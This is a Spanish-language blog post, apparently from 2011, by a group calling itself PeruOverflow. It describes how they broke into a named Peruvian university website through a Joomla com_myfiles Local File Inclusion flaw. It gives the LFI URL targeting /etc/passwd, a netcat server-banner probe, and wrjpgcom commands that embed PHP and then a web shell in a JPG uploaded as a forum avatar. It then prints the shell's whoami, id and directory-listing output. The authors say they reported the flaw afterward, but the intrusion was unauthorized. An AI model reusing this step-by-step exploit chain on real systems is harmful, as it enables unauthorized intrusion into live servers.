martes, 16 de agosto de 2011

Full Disclosure - Tux Of Death



No sé a realizado deface ni afectado la continuidad del sitio Web nos hemos limitado a crear una nueva vista.  aunque la forma de hacer es demaciado sencilla recuerden que no somos Lammers aunque se merescan un deface

 

Como lo mencione en un Post anterior la CSL unacinux de la Unac tiene una vulnerabilidad LFI la cual podriamos haberla explotado por injeccion de codigo en una imagen jpg la cual es ese TUX medio Rambo que temos en la parte de arriba =) bueno vamos con la explotacion.
hago un copy & paste de el post anterior .

DATOS SOBRE EL BUG
Joomla Component My Files Local File Inclusion Vulnerability
Software : com_myfiles version 1.0
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/

DATOS SOBRE LA EXPLOTACION
Target: csl.unac.edu.pe
Autor : PeruOverflow [ Neotrons Reverse Null ]
Vector de intrusión: Inclusión de codigo php en Metadatos de la cabecera jpg
Title: Tux of Death
Identificacion del Bug: (poner el % y el 00 juntos)
http://csl.unac.edu.pe/index.php?option=com_myfiles&controller=../../../../../../../../../../etc/passwd% 00
Grado de Impacto: Medio/Alto

EXPLOTACION:
 
Listando los componentes vulnerables de joomla con un pequeño scrip que programe en Python, me topé con que este sitio web viene utilizando el componente com_myfiles el cual en la versión 1.0 tenía un Bug de LFI.

Como ya sabemos un LFI permite a terceros incluir archivos locales en una petición url debido a una mala filtración de código en la utilización de la función “include” de php aunque no es la única.

La vulnerabilidad puede ser identificada así: (poner el % y el 00 juntos final de la url ya que el blog no lo está reconociendo)


Teniendo ya identificado el bug solo era necesario recopilar información para tener un vector de cómo poder explotar esta vulnerabilidad.

root@neotrons:~# nc  -vv  csl.unac.edu.pe 80
HEAD / HTTP 1.0/

Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny6

Tenemos que en un apache 2.2.9 por tanto podríamos obtener algunos datos importantes de los siguientes archivos de configuración de apache:

/etc/apache2/apache2.conf

/etc/apache2/mods-enabled/dir.conf

/etc/apache2/sites-available/default

De este último archivo son importantes las directivas:
(poner el % y el 00 juntos final de la url ya que el blog no lo está reconociendo)

CustomLog /home/webmaster/access-logs/unac.edu.pe-access.log
ErrorLog  home/webmaster/access-logs/unac.edu.pe-error.log

Y otros archivos más que podemos ir verificando.

Debido a que la configuración de php no nos dejaba ver los archivos “Error Log” ni “Custom Log”, por tiempo decidimos hacer la explotación de una manera no tan elegante que es por medio de Inclusión de código php en Metadatos de la cabecera jpg, aprovechando que el sitio web cuenta con un foro abierto al quien dese registrarse, no obstante estamos explotando la posibilidad de lograr una explotación por medio de envenenamiento de las variables de sesión próximo tuto =)
Cogimos una imagen tux.jpg y le inyectamos codigo php sin alterar la imagen convirtiéndola en tux-of-death.jpg irónicamente =P

root@neotrons:~#  wrjpgcom -c " <?php echo 'PeruOverflow'; ?> " tux.jpg > tux-of-death.jpg

Luego creamos un usuario en el foro al cual le pusimos neotrons y subimos el
tux-of-death.jpg como imagen de nuestro avatar, y luego la incluimos =P
(poner el % y el 00 juntos final de la url ya que el blog no lo está reconociendo)

Como verificamos que se puedo ejecutar el codigo php adjuntado incluimos el codigo de la WebShell 1.31h una de las favoritas a tux-of-death.jpg y cargamos la nueva imagen a nuestro avatar

root@neotrons:~#  wrjpgcom -c tux.jpg <shell.txt> tux-of-death.jpg

Se logra incluir la imagen y nos devuelve una muy bonita Shell =P


Así que tenemos la Shell algunos datos que obtuvimos, lo que causa más asombro es ver muchos archivos y carpetas con dueño csl con permisos 777

Whoami > www-data

Id > uid=33(www-data) gid=33(www-data) groups=33(www-data)

ls -lia /home/csl/public_html

total 396
 573445 drwxrwxrwx 29 root     root      4096 Jul 29 22:19 .
 573444 drwxr-xr-x  6 root     root      4096 Nov 23  2009 ..
 573462 -rwxrwxrwx  1 csl      csl       3596 Apr 16 22:21 .htaccess
7479313 -rw-r--r--  1 www-data www-data 79690 Nov 16  2010 AFICHE.jpg
 573447 -rwxrwxrwx  1 csl      csl      77640 Apr 16 22:17 CHANGELOG.php
 573456 -rwxrwxrwx  1 csl      csl       1175 Jan 24  2010 COPYRIGHT.php
 573457 -rwxrwxrwx  1 csl      csl      14894 Jan 24  2010 CREDITS.php
 573458 -rwxrwxrwx  1 csl      csl       4345 Jul 29 22:33 INSTALL.php
 573459 -rwxrwxrwx  1 csl      csl      17816 Jan 24  2010 LICENSE.php
 573460 -rwxrwxrwx  1 csl      csl      27984 Jan 24  2010 LICENSES.php
 704521 drwxrwxrwx 11 csl      csl       4096 Jan 24  2010 administrator
1007801 drwxr-xr-x  5 csl      csl       4096 Mar 30 00:02 aniversario2011
 706100 drwxrwxrwx  9 csl      csl       4096 May 15 13:07 cache
 706099 drwxrwxrwx 22 csl      csl       4096 Jul 30 01:30 components
 573446 -r--r--r--  1 www-data www-data  1684 Jun 27 21:37 configuration.php
 573461 -rwxrwxrwx  1 csl      csl       3411 Apr 16 22:21 configuration.php-dist
1066794 drwxr-xr-x  2 csl      csl       4096 Apr 17 15:58 contador
 802854 drwxrwxrwx 17 csl      csl       4096 Mar 27  2010 flisol
1007803 drwxrwxrwx 18 csl      csl       4096 Apr 25 00:34 flisol2011
 942270 drwxr-xr-x 12 csl      csl       4096 Nov  8  2010 foro
 573443 -rw-r--r--  1 csl      csl         53 Nov  5  2010 google51534fd866b5d29a.html
 706472 drwxrwxrwx 11 csl      csl       4096 May 28 22:47 images
 706571 drwxrwxrwx  8 csl      csl       4096 May 15 00:12 includes
 573448 -rw-r--r--  1 csl      csl       3471 May 28 22:48 index.html
 573463 -rwxrwxrwx  1 csl      csl       2049 Apr 16 22:21 index.php
 573464 -rwxrwxrwx  1 csl      csl        588 Apr 16 22:21 index2.php
 712893 drwxrwxrwx 32 csl      csl       4096 Sep 25  2010 language
 713063 drwxrwxrwx 16 csl      csl       4096 Jan 24  2010 libraries
 713630 drwxrwxrwx  3 csl      csl       4096 Nov  8  2010 logs
1082600 drwxr-xr-x  3 csl      csl       4096 Apr 23 23:50 mapamental
 713631 drwxrwxrwx  5 csl      csl       4096 Jun  1 16:26 media
 713666 drwxrwxrwx 24 csl      csl       4096 Apr 21 11:30 modules
1630306 drwxr-xr-x  5 csl      csl       4096 Jun  7 20:49 moodle
 976186 drwxr-xr-x  3 www-data www-data  4096 Jun 18 20:14 phocadownload
 713826 drwxrwxrwx 11 csl      csl       4096 Jan 24  2010 plugins
1083151 drwxr-xr-x  8 csl      csl       4096 May 25 23:55 preguntas
 573450 -rwxr-xr-x  1 www-data www-data   304 Jul 29 22:19 robots.php
 573465 -rwxrwxrwx  1 csl      csl        304 Jan 24  2010 robots.txt
 573449 -rw-r--r--  1 csl      csl        601 May 29 12:24 style.css
 721027 drwxrwxrwx  8 csl      csl       4096 May 11 23:30 templates
 721719 drwxrwxrwx  5 csl      csl       4096 Jul 30 00:57 tmp
 721932 drwxrwxrwx  6 csl      csl       4096 Jan 30  2010 unacinux2009
 983067 drwxr-xr-x 17 csl      csl       4096 Dec  4  2010 unacinux2010
 942772 drwxr-xr-x  2 www-data www-data  4096 Nov  8  2010 uploads
1573182 drwxr-xr-x 15 csl      csl       4096 Jun 16 10:09 wiki
 721720 drwxrwxrwx  4 csl      csl       4096 Jan 24  2010 xmlrpc

Ya que no somos defacer ni nos gusta joder, arruinando el esfuerzo de otros, enviamos un email a csl.unac.unacinux@gmail.com  informándoles sobre la vulnerabilidad que a mi parecer podría catalogar el riesgo alto debido a la facilidad con que se puede explotar la vulnerabilidad y el grado de impacto que puede causar en el sitio web así como informándole que publicaríamos la intrusión =) bueno como símbolo de nuestra intrusión les dejamos este pantallaso =P

No hay comentarios:

Publicar un comentario